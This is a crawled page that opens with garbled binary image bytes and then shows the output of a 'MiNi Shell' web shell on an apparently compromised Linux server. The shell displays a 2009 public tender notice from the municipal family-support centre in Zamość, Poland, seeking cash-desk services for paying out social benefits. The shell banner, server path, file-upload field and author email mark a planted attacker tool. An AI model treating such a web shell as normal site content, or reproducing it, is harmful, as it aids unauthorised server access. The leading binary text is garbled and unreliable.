JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090310/57046-N-2009.html

<p class="kh_header"><b>Zamość: Obsługa kasowa wypłat świadczeń realizowanych przez Miejskie Centrum Pomocy Rodzinie w Zamościu</b><br>
<b>Numer ogłoszenia: 57046 - 2009; data zamieszczenia: 10.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Centrum Pomocy Rodzinie w Zamościu , ul. Lwowska 57, 22-400 Zamość, woj. lubelskie, tel. 0-84 639 33 74, 627 06 76, faks 0-84 639 33 74.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa kasowa wypłat świadczeń realizowanych przez Miejskie Centrum Pomocy Rodzinie w Zamościu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem postępowania o udzielenie zamówienia publicznego jest obsługa kasowa w zakresie wypłat pieniężnych świadczeniobiorcom MCPR w Zamościu w liczbie około 3 600 osób miesięcznie, na kwotę około 750.000 zł miesięcznie, w około 8 terminach płatności w ciągu miesiąca, na podstawie następujących ustaw: 1. O pomocy społecznej z dn. 12.03.2004 (Dz.U., Nr 228, poz. 593 ze zm.), 2. O świadczeniach rodzinnych z dn. 28.11.2003 r. (Dz.U., Nr 228 poz. 2255 ze zm.), 3. O pomocy państwa osobom uprawnionym do alimentów z dn. 07.09.2007 r. (Dz.U., Nr 192, poz.1378 ze zm.). Punkt kasowy posiadający minimum dwa wydzielone okienka do obsługi świadczeniobiorców, spełniający wymagane normy, musi znajdować się na terenie miasta Zamościa w miejscu ogólnie dostępnym. Wypłaty dokonywane będą w godzinach od 8.00 do 16.00. Natomiast w jednym dniu wskazanym przez Wykonawcę w godzinach od 8.00 do 17.00. Zamówienie będzie realizowane od 01.05.2009 r. do 30.04.2012 r. (36 miesięcy).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełnią następujące  warunki udziału w postępowaniu:
1.1. Nie podlegają wykluczeniu z postępowania na podstawie art. 24 i art. 22 ust. 1,  pkt 4 ustawy Prawo Zamówień Publicznych.
1.2. Spełniają warunki określone w art. 22 ust. 1 pkt. 1-3 ustawy Prawo Zamówień Publicznych. 
1.3. Wykonawca złoży przygotowaną ofertę zgodnie z wymogami Rozdziału II specyfikacji istotnych warunków zamówienia w terminie i miejscu wyznaczonym w Rozdziale VIII specyfikacji istotnych warunków zamówienia.
2.Zamawiający zawiadamia niezwłocznie Wykonawcę  o wykluczeniu z postępowania o udzielenie zamówienia podając uzasadnienie faktyczne i prawne. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą  i  nie będzie podlegać dalszej ocenie.
Zamawiający dokona oceny spełnienia w. wym. warunków na podstawie kompletności złożonych dokumentów wymienionych w Rozdziale VI specyfikacji istotnych warunków zamówienia, zgodnie z formułą (spełnia - nie spełnia).
3.W toku dokonywania oceny złożonych ofert Zamawiający może żądać udzielenia przez oferentów wyjaśnień, dotyczących treści złożonych przez nich ofert.
Niedopuszczalne jest prowadzenie między Zamawiającym a Wykonawcą negocjacji dotyczących złożonej oferty oraz dokonywania jakiejkolwiek zmiany w jej treści, z zastrzeżeniem art. 87 ust. 2  ustawy PZP.
4. Wykonawca, który nie złoży wymaganych w rozdziale VI oświadczeń, informacji i dokumentów potwierdzających spełnienie warunków udziału w postępowaniu lub nie spełni innych wymagań określonych w ustawie PZP lub SIWZ, lub innych przepisach obowiązującego prawa, lub złożone dokumenty zawierają błędy zostanie wykluczony z udziału w postępowaniu przetargowym na podstawie art. 24  ust. 2 ustawy PZP.
5. Zgodnie z art. 26 ust. 3 ustawy PZP Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie, chyba że mimo ich uzupełnienia konieczne byłoby unieważnienie postępowania.
6. Zgodnie z art. 26 ust. 4 ustawy PZP Zamawiający wezwie także, w wyznaczonym przez siebie terminie do złożenia wyjaśnień dotyczących oświadczeń i dokumentów, o których mowa w art. 25 ust. 1 ustawy PZP..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Zawartość oferty wraz z wymaganymi dokumentami i oświadczeniami potwierdzającymi spełnienie warunków udziału w postępowaniu.
W celu potwierdzenia spełnienia warunków Wykonawca zobowiązany jest złożyć niżej wymienione załączniki:
1.1. Wypełniony formularz oferty na załączonym druku stanowiącym Załącznik Nr 1 do specyfikacji istotnych warunków zamówienia.
1.2. Oświadczenie w trybie art.22 ust.1, pkt. 1-3 ustawy PZP złożonym na druku stanowiącym Załącznik Nr 2 do specyfikacji istotnych warunków zamówienia.
1.3. Oświadczenie o nie podleganiu wykluczeniu na podstawie art. 24 i art. 22 ust. 1 pkt 4 ustawy PZP złożone na załączonym druku stanowiącym Załącznik Nr 3 do specyfikacji istotnych warunków zamówienia. 
1.4. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, potwierdzające posiadanie uprawnień do wykonywania określonej działalności lub czynności w zakresie objętym zamówieniem i przedstawiające aktualny stan faktyczny i prawny. Dokument musi być wystawiony nie wcześniej niż 6 m-cy przed upływem terminu składania ofert. W przypadku składania oferty przez konsorcjum do oferty musi być załączona umowa konsorcyjna. 
UMOWA KONSORCYJNA musi zawierać:
-określenie celu gospodarczego, 
-oznaczenie czasu trwania konsorcjum obejmującego okres realizacji przedmiotu zamówienia, gwarancji i rękojmi,
-solidarną odpowiedzialność każdego członka konsorcjum wobec Zamawiającego obejmującą etap realizacji zamówienia, gwarancji i rękojmi,
-wykluczenie możliwości wypowiedzenia umowy konsorcjum przez któregokolwiek z jego członków do czasu wykonania zamówienia oraz upływu czasu gwarancji i rękojmi,
-zakaz zmian w umowie bez zgody Zamawiającego.
Ponadto Zamawiający bezwzględnie wymaga, aby umowa konsorcjum:
-upoważniała jednego z członków konsorcjum - głównego partnera - jako osobę prawną i reprezentującą wskazaną osobę fizyczną do występowania w imieniu każdego z pozostałych partnerów konsorcjum we wszystkich sprawach związanych z ofertą oraz umową,
-była zawarta z notarialnie potwierdzonymi podpisami.
Nie dopuszcza się składania umowy przedwstępnej konsorcjum lub umowy zawartej pod warunkiem zawieszającym.
Dokument ten potwierdza spełnienie warunku określonego w pkt. 1.2. Rozdziału V specyfikacji istotnych warunków zamówienia.
1.5. Informacja na temat swojej dotychczasowej działalności wykonywanej w okresie ostatnich pięciu lat. 
1.6. Wykaz posiadanych osób, zasobów lokalowych i rzeczowych zapewniających realizację zadania.
1.7. Referencje dotyczące dotychczasowej działalności wystawione przez Zamawiających ( inwestorów ) potwierdzające, że zamówienia wykonane w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zostały wykonane należycie. 
1.8. Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków związanymi z działalnością Wykonawcy lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
1.9. Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych (lub KRUS)  potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mcpr.zamosc.bip.info.pl, www.bip.zamosc.um.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Centrum Pomocy Rodzinie w Zamościu, ul. Lwowska 57, pok. Nr 12 - Dział Świadczeń, w godz. 7.30 - 15.30.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2009 godzina 11:00, miejsce: Miejskie Centrum Pomocy Rodzinie w Zamościu, ul. Lwowska 57, pok. Nr 14 - Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com